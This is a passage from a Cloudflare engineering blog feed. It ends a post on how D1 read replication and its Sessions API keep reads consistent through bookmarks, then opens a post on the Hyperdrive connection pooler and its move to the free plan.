  .prepare('INSERT INTO Orders VALUES (?, ?, ?)')
  .bind(order.orderId, order.customerId, order.quantity)
  .run()

// E. Session read-after-write query.
const { results } = await session
  .prepare('SELECT * FROM Orders')
  .all()</code></pre>
            <p>Note that we could make a single batch query to the primary including both the write and the list, but the benefit of using the new Sessions API is that you can use the extra read replica databases for your read queries and allow the primary database to handle more write queries.</p><p>The session object does the necessary bookkeeping to maintain the latest bookmark observed across all queries executed using that specific session, and always includes that latest bookmark in requests to D1. Note that any query executed without using the session object is not guaranteed to be sequentially consistent with the queries executed in the session.</p><p>When possible, we suggest continuing sessions across requests by including bookmarks in your responses to clients (<b><i>step B</i></b>), and having clients pass previously received bookmarks in their future requests.</p>
            <pre><code>// B. Return the bookmark so we can continue the session in another request.
response.headers.set('x-d1-bookmark', session.getBookmark())</code></pre>
            <p>This allows <i>all</i> of a client’s requests to be in the same session. You can do this by grabbing the session’s current bookmark at the end of the request (<code>session.getBookmark()</code>) and sending the bookmark in the response back to the client in HTTP headers, in HTTP cookies, or in the response body itself.</p>
    <div>
      <h3>Consistency with and without Sessions API</h3>
      <a href="#consistency-with-and-without-sessions-api">
        
      </a>
    </div>
    <p>In this section, we will explore the classic scenario of a read-after-write query to showcase how using the new D1 Sessions API ensures that we get sequential consistency and avoid any issues with inconsistent results in our application.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1zIBf3V1YIogYJKeWm1kDn/f484faf38cc0f8d7227f9db1fa386354/1.png" />
          </figure><p>The Client, a user Worker, sends a D1 write query that gets processed by the database primary and gets the results back. However, the subsequent read query ends up being processed by a database replica. If the database replica is lagging far enough behind the database primary that it does not yet include the first write query, then the returned results will be inconsistent, and probably incorrect for your application’s business logic.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1w81ec5tNGWJ7sQyFBZQ6l/d487ccf225a097a0e48054d88df0ba1f/2.png" />
          </figure><p>Using the Sessions API fixes the inconsistency issue. The first write query is again processed by the database primary, and this time the response includes “<b>Bookmark 100</b>”. The session object will store this bookmark for you transparently.</p><p>The subsequent read query is processed by a database replica as before, but now since the query includes the previously received “<b>Bookmark 100</b>”, the database replica will wait until its database copy is at least as up-to-date as “<b>Bookmark 100</b>”. Only once it’s up-to-date will the read query be processed and the results returned, including the replica’s latest bookmark “<b>Bookmark 104</b>”.</p><p>Notice that the returned bookmark for the read query is “<b>Bookmark 104</b>”, which is different from the one passed in the query request. This can happen if there were other writes from other client requests that also got replicated to the database replica in between the two queries our own client executed.</p>
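<p>The replica-side wait can be modeled in a few lines. In this sketch (illustrative TypeScript, with numeric bookmarks standing in for D1's opaque ones), a read that demands a bookmark the replica hasn't applied yet is simply held until replication catches up.</p>

```typescript
// Toy replica that holds back reads until it has applied a WAL entry
// with a bookmark at least as new as the one the session demands.
class ToyReplica {
  applied = 0; // highest bookmark this replica has applied
  private pending: Array<{ atLeast: number; run: () => void }> = [];

  // Serve immediately if up-to-date; otherwise park the query.
  read(atLeast: number, run: () => void): void {
    if (this.applied >= atLeast) run();
    else this.pending.push({ atLeast, run });
  }

  // Called as WAL entries stream in from the primary.
  apply(bookmark: number): void {
    this.applied = bookmark;
    const ready = this.pending.filter((p) => p.atLeast <= bookmark);
    this.pending = this.pending.filter((p) => p.atLeast > bookmark);
    for (const p of ready) p.run();
  }
}
```

<p>A read demanding “Bookmark 100” on a replica that has only applied “Bookmark 97” waits; as soon as the replica applies an entry at or past 100, the read runs and the response carries the replica’s latest bookmark.</p>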
    <div>
      <h2>Enabling read replication</h2>
      <a href="#enabling-read-replication">
        
      </a>
    </div>
    <p>To start using D1 read replication:</p><ol><li><p>Update your Worker to use the D1 Sessions API to tell D1 which queries are part of the same database session. The Sessions API also works with databases that do not have read replication enabled, so it’s safe to ship this code even before you enable replicas. Here’s <a href="http://developers.cloudflare.com/d1/best-practices/read-replication/"><u>an example</u></a>.</p></li><li><p><a href="https://developers.cloudflare.com/d1/best-practices/read-replication/#enable-read-replication"><u>Enable replicas</u></a> for your database via <a href="https://dash.cloudflare.com/?to=/:account/workers/d1"><u>Cloudflare dashboard</u></a> &gt; Select D1 database &gt; Settings.</p></li></ol><p>D1 read replication is built into D1, and you don’t pay extra storage or compute costs for replicas. You incur the exact same D1 usage with or without replicas, based on <code>rows_read</code> and <code>rows_written</code> by your queries. Unlike traditional database systems with replication, you don’t have to manually create replicas, decide where they run, or decide how to route requests between the primary database and read replicas. Cloudflare handles all of this when you use the Sessions API, while ensuring sequential consistency.</p><p>Since D1 read replication is in beta, we recommend trying it on a non-production database first, and migrating your production workloads only after validating that read replication works for your use case.</p><p>If you don’t have a D1 database and want to try out D1 read replication, <a href="https://dash.cloudflare.com/?to=/:account/workers/d1/create"><u>create a test database</u></a> in the Cloudflare dashboard.</p>
    <div>
      <h3>Observing your replicas</h3>
      <a href="#observing-your-replicas">
        
      </a>
    </div>
    <p>Once you’ve enabled D1 read replication, read queries will start to be processed by replica database instances. The response of each query includes read-replication information in the nested <code>meta</code> object, like <code>served_by_region</code> and <code>served_by_primary</code>. The former denotes the region of the database instance that processed the query, and the latter is <code>true</code> if and only if your query was processed by the primary database instance.</p><p>In addition, the <a href="https://dash.cloudflare.com/?to=/:account/workers/d1/"><u>D1 dashboard overview</u></a> for a database now includes information about the database instances handling your queries. You can see how many queries are handled by the primary instance or by a replica, and a breakdown of the queries processed by region. The example screenshots below show graphs displaying the number of queries executed and the number of rows read by each region.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1ChIlqQ5xgJfiftOHw9Egg/b583d00d22dcea60e7439dfbfa1761df/image10.png" />
          </figure>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4Zze5y22759fOIYPOqrK1Y/6cd3c684006ca8234db20924cae8b960/image1.png" />
          </figure>
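<p>If you want a similar breakdown programmatically, the <code>meta</code> fields described above are enough to tally where your queries were served. A small sketch (the helper and result shape are hypothetical; only the two <code>meta</code> field names come from D1):</p>

```typescript
// Tally query responses by serving instance, using the `served_by_region`
// and `served_by_primary` fields of each response's `meta` object.
interface D1Meta { served_by_region: string; served_by_primary: boolean }

function tally(metas: D1Meta[]): { primary: number; replica: number; byRegion: Record<string, number> } {
  const out = { primary: 0, replica: 0, byRegion: {} as Record<string, number> };
  for (const m of metas) {
    if (m.served_by_primary) out.primary++;
    else out.replica++;
    out.byRegion[m.served_by_region] = (out.byRegion[m.served_by_region] ?? 0) + 1;
  }
  return out;
}
```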
    <div>
      <h2>Under the hood: how D1 read replication is implemented</h2>
      <a href="#under-the-hood-how-d1-read-replication-is-implemented">
        
      </a>
    </div>
    <p>D1 is implemented on top of SQLite-backed Durable Objects running on top of Cloudflare’s <a href="https://blog.cloudflare.com/sqlite-in-durable-objects/#under-the-hood-storage-relay-service"><u>Storage Relay Service</u></a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3GWWL8goIzrGTmkH54O416/aabd47fcd94bfc73492556b19ac6069f/5.png" />
          </figure><p>D1 is structured with a 3-layer architecture.  First is the binding API layer that runs in the customer’s Worker.  Next is a stateless Worker layer that routes requests based on database ID to a layer of Durable Objects that handle the actual SQL operations behind D1.  This is similar to how <a href="https://developers.cloudflare.com/durable-objects/what-are-durable-objects/#durable-objects-in-cloudflare"><u>most applications using Cloudflare Workers and Durable Objects are structured</u></a>.</p><p>For a non-replicated database, there is exactly one Durable Object per database.  When a user’s Worker makes a request with the D1 binding for the database, that request is first routed to a D1 Worker running in the same location as the user’s Worker.  The D1 Worker figures out which D1 Durable Object backs the user’s D1 database and fetches an RPC stub to that Durable Object.  The Durable Objects routing layer figures out where the Durable Object is located, and opens an RPC connection to it.  Finally, the D1 Durable Object then handles the query on behalf of the user’s Worker using the Durable Objects SQL API.</p><p>In the Durable Objects SQL API, all queries go to a SQLite database on the local disk of the server where the Durable Object is running.  Durable Objects run <a href="https://www.sqlite.org/wal.html"><u>SQLite in WAL mode</u></a>.  In WAL mode, every write query appends to a write-ahead log (the WAL).  As SQLite appends entries to the end of the WAL file, a database-specific component called the Storage Relay Service <i>leader</i> synchronously replicates the entries to 5 <i>durability followers</i> on servers in different datacenters.  
When a quorum (at least 3 out of 5) of the durability followers acknowledge that they have safely stored the data, the leader allows SQLite’s write queries to commit and opens the Durable Object’s output gate, so that the Durable Object can respond to requests.</p><p>Our implementation of WAL mode allows us to have a complete log of all of the committed changes to the database. This enables several important features in SQLite-backed Durable Objects and D1:</p><ul><li><p>We identify each write with a <a href="https://en.wikipedia.org/wiki/Lamport_timestamp"><u>Lamport timestamp</u></a> we call a <a href="https://developers.cloudflare.com/d1/reference/time-travel/#bookmarks"><u>bookmark</u></a>.</p></li><li><p>We construct databases anywhere in the world by downloading all of the WAL entries from cold storage and replaying each WAL entry in order.</p></li><li><p>We implement <a href="https://developers.cloudflare.com/d1/reference/time-travel/"><u>Point-in-time recovery (PITR)</u></a> by replaying WAL entries up to a specific bookmark rather than to the end of the log.</p></li></ul><p>Unfortunately, having the main data structure of the database be a log is not ideal.  WAL entries are in write order, which is often neither convenient nor fast.  In order to cut down on the overheads of the log, SQLite <i>checkpoints</i> the log by copying the WAL entries back into the main database file.  Read queries are serviced directly by SQLite using files on disk — either the main database file for checkpointed data, or the WAL file for writes more recent than the last checkpoint.  
Similarly, the Storage Relay Service snapshots the database to cold storage so that we can replay a database by downloading the most recent snapshot and replaying the WAL from there, rather than having to download an enormous number of individual WAL entries.</p><p>WAL mode is the foundation for implementing read replication, since we can stream writes to locations other than cold storage in real time.</p>
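<p>The replay mechanism can be sketched in a few lines. In this toy version (a key-value map stands in for the SQLite database, and numeric bookmarks for real ones), booting a database from a snapshot and point-in-time recovery are the same loop; PITR just stops early.</p>

```typescript
// Rebuild a database by starting from a snapshot and applying WAL
// entries in bookmark order. Passing a target bookmark stops the replay
// early, which is exactly point-in-time recovery.
interface WalEntry { bookmark: number; key: string; value: string }

function replay(
  snapshot: Record<string, string>,
  wal: WalEntry[],
  upTo: number = Infinity,
): Record<string, string> {
  const db = { ...snapshot };
  for (const entry of wal) {
    if (entry.bookmark > upTo) break; // PITR: stop at the requested bookmark
    db[entry.key] = entry.value;
  }
  return db;
}
```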
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/ezp8gcf3gXqkvumzufGfP/1a54fc6f434290968c7e695c2e5bb0c9/6.png" />
          </figure><p>We implemented read replication in five major steps.</p><p>First, we made it possible to make replica Durable Objects with a read-only copy of the database.  These replica objects boot by fetching the latest snapshot and replaying the log from cold storage to whatever bookmark the primary database’s leader last committed. This basically gave us point-in-time replicas, since without continuous updates, the replicas never updated until the Durable Object restarted.</p><p>Second, we registered the replica leader with the primary’s leader so that the primary leader sends the replicas every entry written to the WAL at the same time that it sends the WAL entries to the durability followers.  Each of the WAL entries is marked with a bookmark that uniquely identifies the WAL entry in the sequence of WAL entries.  We’ll use the bookmark later.</p><p>Note that since these writes are sent to the replicas <i>before</i> a quorum of durability followers have confirmed them, the writes are actually unconfirmed writes, and the replica leader must be careful to keep the writes hidden from the replica Durable Object until they are confirmed.  The replica leader in the Storage Relay Service does this by implementing enough of SQLite’s <a href="https://www.sqlite.org/walformat.html#the_wal_index_file_format"><u>WAL-index protocol</u></a>, so that the unconfirmed writes coming from the primary leader look to SQLite as though they came from just another SQLite client doing unconfirmed writes.  SQLite knows to ignore the writes until they are confirmed in the log.  The upshot of this is that the replica leader can write WAL entries to the SQLite WAL <i>immediately,</i> and then “commit” them when the primary leader tells the replica that the entries have been confirmed by durability followers.</p><p>One neat thing about this approach is that writes are sent from the primary to the replica as quickly as they are generated by the primary, helping to minimize lag between replicas.  
In theory, if the write query was proxied through a replica to the primary, the response back to the replica will arrive at almost the same time as the message that updates the replica.  In such a case, it looks like there’s no replica lag at all!</p><p>In practice, we find that replication is really fast.  Internally, we measure <i>confirm lag</i>, defined as the time from when a primary confirms a change to when the replica confirms a change.  The table below shows the confirm lag for two D1 databases whose primaries are in different regions.</p><div>
    <figure>
        <table>
            <colgroup>
                <col></col>
                <col></col>
                <col></col>
            </colgroup>
            <tbody>
                <tr>
                    <td>
                        <p><br /><span><span>Replica Region</span></span></p>
                    </td>
                    <td>
                        <p><span><span>Database A</span></span></p>
                        <p><span><span>(Primary region: ENAM)</span></span></p>
                    </td>
                    <td>
                        <p><span><span>Database B</span></span><br /><span><span>(Primary region: WNAM)</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>ENAM</span></span></p>
                    </td>
                    <td>
                        <p><span><span>N/A</span></span></p>
                    </td>
                    <td>
                        <p><span><span>30 ms</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>WNAM</span></span></p>
                    </td>
                    <td>
                        <p><span><span>45 ms</span></span></p>
                    </td>
                    <td>
                        <p><span><span>N/A</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>WEUR</span></span></p>
                    </td>
                    <td>
                        <p><span><span>55 ms</span></span></p>
                    </td>
                    <td>
                        <p><span><span>75 ms</span></span></p>
                    </td>
                </tr>
                <tr>
                    <td>
                        <p><span><span>EEUR</span></span></p>
                    </td>
                    <td>
                        <p><span><span>67 ms</span></span></p>
                    </td>
                    <td>
                        <p><span><span>75 ms</span></span></p>
                    </td>
                </tr>
            </tbody>
        </table>
    </figure>
</div><p><sup><i>Confirm lag for 2 replicated databases.  N/A means that we have no data for this combination.  The region abbreviations are the same ones used for </i></sup><a href="https://developers.cloudflare.com/durable-objects/reference/data-location/#supported-locations-1"><sup><i><u>Durable Object location hints</u></i></sup></a><sup><i>.</i></sup></p><p>The table shows that confirm lag is correlated with the network round-trip time between the data centers hosting the primary databases and their replicas.  This is clearly visible in the difference between the confirm lag for the European replicas of the two databases.  As airline route planners know, EEUR is <a href="http://www.gcmap.com/mapui?P=ewr-lhr,+ewr-waw"><u>appreciably further away</u></a> from ENAM than WEUR is, but from WNAM, both European regions (WEUR and EEUR) are <a href="http://www.gcmap.com/mapui?P=sjc-lhr,+sjc-waw"><u>about equally as far away</u></a>.  We see that in our replication numbers.</p><p>The exact placement of the D1 database in the region matters too.  Regions like ENAM and WNAM are quite large in themselves.  Database A’s placement in ENAM happens to be further away from most data centers in WNAM compared to database B’s placement in WNAM relative to the ENAM data centers.  As such, database B sees slightly lower confirm lag.</p><p>Try as we might, we can’t beat the speed of light!</p><p>Third, we updated the Durable Object routing system to be aware of Durable Object replicas.  When read replication is enabled on a Durable Object, two things happen.  First, we create a set of replicas according to a replication policy.  The current replication policy that D1 uses is simple: a static set of replicas in <a href="https://developers.cloudflare.com/d1/configuration/data-location/#available-location-hints"><u>every region that D1 supports</u></a>.  Second, we turn on a routing policy for the Durable Object.  
The current policy that D1 uses is also simple: route to the Durable Object replica in the region close to where the user request is.  With this step, we have updateable read-only replicas, and can route requests to them!</p><p>Fourth, we updated D1’s Durable Object code to handle write queries on replicas. D1 uses SQLite to figure out whether a request is a write query or a read query.  This means that the determination of whether something is a read or write query happens <i>after</i> the request is routed.  Read replicas will have to handle write requests!  We solve this by instantiating each replica D1 Durable Object with a reference to its primary.  If the D1 Durable Object determines that the query is a write query, it forwards the request to the primary for the primary to handle. This happens transparently, keeping the user code simple.</p><p>As of this fourth step, we can handle read and write queries at every copy of the D1 Durable Object, whether it's a primary or not.  Unfortunately, as outlined above, if a user's requests get routed to different read replicas, they may see different views of the database, leading to a very weak consistency model.  So the last step is to implement the Sessions API across the D1 Worker and D1 Durable Object.  Recall that every WAL entry is marked with a bookmark.  These bookmarks uniquely identify a point in (logical) time in the database.  Our bookmarks are strictly monotonically increasing; every write to a database makes a new bookmark with a value greater than any other bookmark for that database.</p><p>Using bookmarks, we implement the Sessions API with the following algorithm split across the D1 binding implementation, the D1 Worker, and D1 Durable Object.</p><p>First up in the D1 binding, we have code that creates the <code>D1DatabaseSession</code> object and code within the <code>D1DatabaseSession</code> object to keep track of the latest bookmark.</p>
            <pre><code>// D1Binding is the binding code running within the user's Worker
// that provides the existing D1 Workers API and the new withSession method.
class D1Binding {
  // Injected by the runtime to the D1 Binding.
  d1Service: D1ServiceBinding

  withSession(initialBookmark) {
    return new D1DatabaseSession(this.d1Service, this.databaseId, initialBookmark);
  }
  }
}

// D1DatabaseSession holds metadata about the session, most importantly the
// latest bookmark we know about for this session.
class D1DatabaseSession {
  constructor(d1Service, databaseId, initialBookmark) {
    this.d1Service = d1Service;
    this.databaseId = databaseId;
    this.bookmark = initialBookmark;
  }

  async exec(query) {
    // The exec method in the binding sends the query to the D1 Worker
    // and waits for the response, updating the bookmark as
    // necessary so that future calls to exec use the updated bookmark.
    var resp = await this.d1Service.handleUserQuery(this.databaseId, query, this.bookmark);
    if (isNewerBookmark(this.bookmark, resp.bookmark)) {
      this.bookmark = resp.bookmark;
    }
    return resp;
  }

  // batch and other SQL APIs are implemented similarly.
}</code></pre>
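<p>The <code>exec</code> method above relies on an <code>isNewerBookmark</code> helper. A minimal sketch, assuming bookmarks are opaque strings whose lexicographic order matches their strictly increasing logical order, and that the sentinel values (<code>"first-primary"</code>, <code>"first-unconstrained"</code>) sort before any real bookmark; the actual encoding is an internal detail of D1:</p>

```typescript
// Hypothetical helper: returns true when `candidate` is strictly newer
// than `current`. Assumes bookmarks are encoded so that lexicographic
// comparison matches their logical (strictly increasing) order, and that
// sentinel values are always considered older than any real bookmark.
function isNewerBookmark(current: string, candidate: string): boolean {
  const isSentinel = (b: string) => b.startsWith("first-");
  if (isSentinel(candidate)) return false; // a sentinel never advances the session
  if (isSentinel(current)) return true;    // any real bookmark beats a sentinel
  return candidate > current;              // lexicographic comparison
}
```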
            <p>The binding code calls into the D1 stateless Worker (<code>d1Service</code> in the snippet above), which figures out which Durable Object to use, and proxies the request to the Durable Object.</p>
            <pre><code>class D1Worker {
  async handleUserQuery(databaseId, query, bookmark) {
    var doId = /* look up Durable Object for databaseId */;
    return await this.D1_DO.get(doId).handleWorkerQuery(query, bookmark);
  }
  }
}</code></pre>
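<p>The lookup elided in the snippet above can be sketched with the Durable Object namespace's deterministic ID derivation, so that every invocation routes queries for the same database to the same object. The interface and names here are illustrative; the real mapping is internal to D1:</p>

```typescript
// Hypothetical sketch: derive a Durable Object ID deterministically from
// the database ID, so queries for the same database always reach the same
// Durable Object (or, with read replication on, a replica of it).
interface DurableObjectNamespaceLike {
  idFromName(name: string): string;
  get(id: string): {
    handleWorkerQuery(query: string, bookmark?: string): Promise<unknown>;
  };
}

function lookupDatabaseStub(ns: DurableObjectNamespaceLike, databaseId: string) {
  const doId = ns.idFromName(databaseId); // same name -> same ID, every time
  return ns.get(doId);
}
```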
            <p>Finally, we reach the Durable Objects layer, which figures out how to actually handle the request.</p>
            <pre><code>class D1DurableObject {
  async handleWorkerQuery(query, bookmark) {
    bookmark = bookmark ?? "first-primary";
    var results = {};

    if (this.isPrimaryDatabase()) {
      // The primary always has the latest data so we can run the
      // query without checking the bookmark.
      var result = /* execute query directly */;
      bookmark = getCurrentBookmark();
      results = result;
    } else {
      // This is running on a replica.
      if (bookmark === "first-primary" || isWriteQuery(query)) {
        // The primary must handle this request, so we'll proxy the
        // request to the primary.
        var resp = await this.primary.handleWorkerQuery(query, bookmark);
        bookmark = resp.bookmark;
        results = resp.results;
      } else {
        // The replica can handle this request, but only after the
        // database is up-to-date with the bookmark.
        if (bookmark !== "first-unconstrained") {
          await waitForBookmark(bookmark);
        }
        var result = /* execute query locally */;
        bookmark = getCurrentBookmark();
        results = result;
      }
    }
    return { results: results, bookmark: bookmark };
  }
}</code></pre>
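<p>The <code>waitForBookmark</code> call above is where a replica blocks until replication catches up. A minimal polling sketch, assuming a <code>getCurrentBookmark</code> accessor that advances as replicated WAL entries are applied, and lexicographically ordered bookmarks; the real implementation presumably wakes on WAL apply rather than polling:</p>

```typescript
// Hypothetical sketch of a replica waiting to catch up to a bookmark.
// Assumes bookmarks are strings whose lexicographic order matches their
// logical order, and that applying WAL entries advances getCurrentBookmark().
async function waitForBookmark(
  target: string,
  getCurrentBookmark: () => string,
  pollMs = 5,
  timeoutMs = 5000,
): Promise<void> {
  const deadline = Date.now() + timeoutMs;
  while (getCurrentBookmark() < target) {
    if (Date.now() > deadline) {
      throw new Error(`replica did not reach bookmark ${target} in time`);
    }
    await new Promise((resolve) => setTimeout(resolve, pollMs));
  }
}
```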
            <p>The D1 Durable Object first figures out if this instance can handle the query, or if the query needs to be sent to the primary.  If the Durable Object can execute the query, it ensures that we execute the query with a bookmark at least as up-to-date as the bookmark requested by the binding.</p><p>The upshot is that the three pieces of code work together to ensure that all of the queries in the session see the database in a sequentially consistent order, because each new query will be blocked until it has seen the results of previous queries within the same session.</p>
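<p>Putting the pieces together, using the Sessions API from a Worker looks roughly like this. The binding name (<code>DB</code>), the table, and the queries are invented for the example:</p>

```typescript
// Illustrative Worker using the D1 Sessions API. In a real Workers project
// this object would be the module's default export.
const worker = {
  async fetch(_request: Request, env: { DB: { withSession(b: string): any } }): Promise<Response> {
    // "first-unconstrained": the first query may be served by any replica;
    // later queries in the session never observe older data.
    const session = env.DB.withSession("first-unconstrained");

    await session.exec("INSERT INTO orders (item) VALUES ('book')");
    // Guaranteed to observe the insert above: the session carries forward
    // the bookmark returned by the write.
    const result = await session.exec("SELECT COUNT(*) AS n FROM orders");

    return Response.json(result);
  },
};
```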
    <div>
      <h2>Conclusion</h2>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>D1’s new read replication feature is a significant step towards making globally distributed databases easier to use without sacrificing consistency. With automatically provisioned replicas in every region, your applications can now serve read queries faster while maintaining strong sequential consistency across requests, and keeping your application Worker code simple.</p><p>We’re excited for developers to explore this feature and see how it improves the performance of your applications. The public beta is just the beginning—we’re actively refining and expanding D1’s capabilities, including evolving replica placement policies, and your feedback will help shape what’s next.</p><p>Note that the Sessions API is only available through the <a href="https://developers.cloudflare.com/d1/worker-api/"><u>D1 Worker Binding</u></a> for now, and support for the HTTP REST API will follow soon.</p><p>Try out D1 read replication today by clicking the “Deploy to Cloudflare” button, check out <a href="http://developers.cloudflare.com/d1/best-practices/read-replication/"><u>documentation and examples</u></a>, and let us know what you build in the <a href="https://discord.com/channels/595317990191398933/992060581832032316"><u>D1 Discord channel</u></a>!</p><a href="https://deploy.workers.cloudflare.com/?url=https://github.com/cloudflare/templates/tree/main/d1-starter-sessions-api-template"><img src="https://deploy.workers.cloudflare.com/button" /></a>
]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[D1]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Edge Database]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[SQL]]></category>
            <guid isPermaLink="false">2qUAO70BqnRBomg83fCRPe</guid>
            <dc:creator>Justin Mazzola Paluska</dc:creator>
            <dc:creator>Lambros Petrou</dc:creator>
        </item>
        <item>
            <title><![CDATA[Pools across the sea: how Hyperdrive speeds up access to databases and why we’re making it free]]></title>
            <link>https://blog.cloudflare.com/how-hyperdrive-speeds-up-database-access/</link>
            <pubDate>Tue, 08 Apr 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Hyperdrive, Cloudflare's global connection pooler, relies on some key innovations to make your database connections work. Let's dive deeper, in celebration of its availability for Free Plan customers. ]]></description>
            <content:encoded><![CDATA[
    <div>
      <h2>Free as in beer</h2>
      <a href="#free-as-in-beer">
        
      </a>
    </div>
    <p>In acknowledgement of its pivotal role in building distributed applications that rely on regional databases, we’re making Hyperdrive available on the free plan of Cloudflare Workers!</p><p><a href="https://developers.cloudflare.com/hyperdrive/"><u>Hyperdrive</u></a> enables you to build performant, global apps on Workers with <a href="https://developers.cloudflare.com/hyperdrive/examples/"><u>your existing SQL databases</u></a>. Tell it your database connection string, bring your existing drivers, and Hyperdrive will make connecting to your database faster. No major <a href="https://www.cloudflare.com/learning/cloud/how-to-refactor-applications/">refactors</a> or convoluted configuration required.</p><p>Over the past year, Hyperdrive has become a key service for teams that want to build their applications on Workers and connect to SQL databases. This includes our own engineering teams, with Hyperdrive serving as the tool of choice to connect from Workers to our own Postgres clusters for many of the control-plane actions of our billing, <a href="https://www.cloudflare.com/developer-platform/products/d1/"><u>D1</u></a>, <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>R2</u></a>, and <a href="https://www.cloudflare.com/developer-platform/products/workers-kv/"><u>Workers KV</u></a> teams (just to name a few). </p><p>This has highlighted for us that Hyperdrive is a fundamental building block, and it solves a common class of problems for which there isn’t a great alternative. We want to make it possible for everyone building on Workers to connect to their database of choice with the best performance possible, using the drivers and frameworks they already know and love.</p>
    <div>
      <h3>Performance is a feature</h3>
      <a href="#performance-is-a-feature">
        
      </a>
    </div>
    <p>To illustrate how much Hyperdrive can improve your application’s performance, let’s write the world’s simplest benchmark. This is obviously not production code, but is meant to be reflective of a common application you’d bring to the Workers platform. We’re going to use a simple table, a very popular OSS driver (<a href="https://github.com/porsager/postgres"><u>postgres.js</u></a>), and run a standard OLTP workload from a Worker. We’re going to keep our origin database in London, and query it from Chicago (those locations will come back up later, so keep them in mind).</p>
            <pre><code>// This is the test table we're using
// CREATE TABLE IF NOT EXISTS test_data(userId bigint, userText text, isActive bool);

import postgres from 'postgres';

let direct_conn = '&lt;direct connection string here!&gt;';
let hyperdrive_conn = env.HYPERDRIVE.connectionString;

async function measureLatency(connString: string) {
	let beginTime = Date.now();
	let sql = postgres(connString);

	await sql`INSERT INTO test_data VALUES (${999}, 'lorem_ipsum', ${true})`;
	await sql`SELECT userId, userText, isActive FROM test_data WHERE userId = ${999}`;

	let latency = Date.now() - beginTime;
	// Close the connection; inside a Worker handler you could instead
	// defer this with ctx.waitUntil(sql.end()) to avoid blocking.
	await sql.end();
	return latency;
}

let directLatency = await measureLatency(direct_conn);
let hyperdriveLatency = await measureLatency(hyperdrive_conn);</code></pre>
            <p>The code above</p><ol><li><p>Takes a standard database connection string, and uses it to create a database connection.</p></li><li><p>Loads a user record into the database.</p></li><li><p>Queries all records for that user.</p></li><li><p>Measures how long this takes to do with a direct connection, and with Hyperdrive.</p></li></ol><p>When connecting directly to the origin database, this set of queries takes an average of 1200 ms. With absolutely no other changes, just swapping out the connection string for <code>env.HYPERDRIVE.connectionString</code>, this number is cut down to 500 ms (an almost 60% reduction). If you enable Hyperdrive’s caching, so that the SELECT query is served from cache, this takes only 320 ms. With this one-line change, Hyperdrive will reduce the latency of this Worker by almost 75%! In addition to this speedup, you also get secure auth and transport, as well as a connection pool to help protect your database from being overwhelmed when your usage scales up. See it for yourself using our <a href="https://hyperdrive-demo.pages.dev/"><u>demo application</u></a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6TTbEV9d7NClGk0iRmkEG3/4d5e4fdeb195337a92942bc7e13dbb6f/image7.png" />
          </figure><p><sup><i>A demo application comparing latencies between Hyperdrive and direct-to-database connections.</i></sup></p><p>Traditional SQL databases are familiar and powerful, but they are designed to be colocated with long-running compute. They were not conceived in the era of modern serverless applications, and have connection models that don't take the constraints of such an environment into account. Instead, they require highly stateful connections that do not play well with Workers’ global and stateless model. Hyperdrive solves this problem by maintaining database connections across Cloudflare’s network ready to be used at a moment’s notice, caching your queries for fast access, and eliminating round trips to minimize network latency.</p><p>With this announcement, many developers are going to be taking a look at Hyperdrive for the first time over the coming weeks and months. To help people dive in and try it out, we think it’s time to talk about how Hyperdrive actually works.</p>
    <div>
      <h2>Staying warm in the pool</h2>
      <a href="#staying-warm-in-the-pool">
        
      </a>
    </div>
    <p>Let’s talk a bit about database connection poolers, how they work, and what problems they already solve. They are <a href="https://github.com/pgbouncer/pgbouncer/commit/a0d2b294e0270f8a246e5b98f0700716c0672b0d"><u>hardly a new technology</u></a>, after all. </p><p>The point of any connection pooler, Hyperdrive or others, is to minimize the overhead of establishing and coordinating database connections. Every new database connection requires additional <a href="https://blog.anarazel.de/2020/10/07/measuring-the-memory-overhead-of-a-postgres-connection/"><u>memory</u></a> and CPU time from the database server, and this scales only so well as the number of concurrent connections climbs. So the question becomes, how should database connections be shared across clients? </p><p>There are three <a href="https://www.pgbouncer.org/features.html"><u>commonly-used approaches</u></a> for doing so. These are:</p><ul><li><p><b>Session mode:</b> whenever a client connects, it is assigned a connection of its own until it disconnects. This dramatically reduces the available concurrency, in exchange for a much simpler implementation and a broader selection of supported features.</p></li><li><p><b>Transaction mode:</b> when a client is ready to send a query or open a transaction, it is assigned a connection on which to do so. This connection will be returned to the pool when the query or transaction concludes. Subsequent queries during the same client session may (or may not) be assigned a different connection.</p></li><li><p><b>Statement mode:</b> like transaction mode, but a connection is given out and returned for each statement. Multi-statement transactions are disallowed.</p></li></ul><p>When building Hyperdrive, we had to decide which of these modes we wanted to use. Each of the approaches implies some <a href="https://jpcamara.com/2023/04/12/pgbouncer-is-useful.html"><u>fairly serious tradeoffs</u></a>, so what’s the right choice? 
